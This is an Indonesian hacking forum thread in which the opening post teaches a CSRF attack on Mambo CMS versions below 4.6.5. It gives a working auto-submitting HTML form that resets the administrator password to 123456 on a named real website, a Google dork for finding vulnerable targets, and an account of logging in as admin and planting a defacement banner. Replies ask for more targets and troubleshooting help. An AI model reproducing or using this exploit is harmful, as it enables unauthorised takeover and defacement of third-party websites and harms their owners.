Page 1 of 1

Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrator)

Posted: Wed Aug 31, 2011 3:00 am
by poni
Mambo adalah CMS web opensource gratis yg banyak digunakan sebagai sistem managemen website. Mambo < 4.6.5 memiliki bug CSRF (Cross Site Request Forgery) dimana hacker bisa mengubah password admin melalui script sederhana. Ingat loh, hanya versi dibawah 4.6.5 yang bisa ditembus dengan teknik ini.

Kita mulai aja yah. tool yang diperlukan hanya
[-] Notepad dan
[-] Browser

buka notepad dan masukkan script dibawah ini. atau edit sesuai target website. google dork = Mambo is Free Software released under the GNU/GPL License.

Code: Select all

<html>
<head>
 </head>
 <body onload="javascript:fireForms()">
 <script language="JavaScript">
 
function fireForms()
{
    var count = 1;
    var i=0;
 
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}
 
	</script>
<form action="http://www.classiminashost.com/administrator/index.php?option=com_users&task=editA&id=62&hidemainmenu=1" method="post" name="adminForm"> 
	
	<input type="hidden" name="name" value="Administrator" /> 
	<input type="hidden" name="username" value="admin" /> 
        <input type="hidden" name="email" value="" /> 
	<input type="hidden" name="password" value="123456" /> 
	<input type="hidden" name="password2" value="123456" /> 
	<input type="hidden" name="gid" value="25" />				
	<input type="radio" name="block" value="0" checked="checked" />
	<input type="radio" name="block" value="1" />
	<input type="radio" name="sendEmail" value="0" />
	<input type="radio" name="sendEmail" value="1" checked="checked" />

</form> 
perhatikan source diatas.
target web adalah http://www.classiminashost.com
username = admin
password = 123456

itu artinya penulis mengganti password administrator di http://www.classiminashost.com dengan 123456 tanpa perlu mengetahui password sebelumnya.

simpan dengan nama hackmambo.html, disini penulis menyimpan file hackmambo.html di desktop. lalu jalankan di browser anda. perhatikan gambar berikut dibawah:

Image
setelah hackmambo.html dijalankan di browser, maka anda akan melihat ada 4 radio button diatas. tunggu beberapa saat sampai halaman redirect dan mengirimkan pengubahan password admin ke website target.

Image
halaman akan redirect ke http://www.classiminashost.com/administ ... mainmenu=1 . isi username dengan admin dan password 123456

Yep.. sekarang penulis berhasil masuk sebagai administrator di http://www.classiminashost.com/ yang masih menggunakan mambo bersi 4.6.2. hmm sepertinya website ini baru dibuat.

Image

:) sekalian nitip logo xcode.

Code: Select all

http://www.classiminashost.com/images/stories//bannerxcode.bmp

Re: Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrat

Posted: Wed Aug 31, 2011 4:31 am
by Jepret
Wow Bos Poni Ga ada mateee nya... mantep Gan..

bos tanya neh sy msh newbie.. ciri2 web mambo apa bos mau coba target lain.. hehehhe

reza

Posted: Tue Sep 06, 2011 8:16 pm
by onteill
gan ane udah cobak ni tehnik..
tpi cuman masuk login formnya doang..
kgak bisa masuk ke admin situsnya..
mohon pencerahannya...

Re: Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrat

Posted: Thu Sep 29, 2011 8:48 am
by djisamsoe
ijin nyimak bos..! terusin dah

Re: Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrat

Posted: Fri Nov 04, 2011 11:25 pm
by andri x code
kak klu untuk CMS mambo yang versi 4.5.2 gimana ya??
klu aku coba metode seperti yang di atas, ngk bisa masuk kk
ada tulisan Incorrect Username, Password, or Access Level. Please try again di sana kk
:(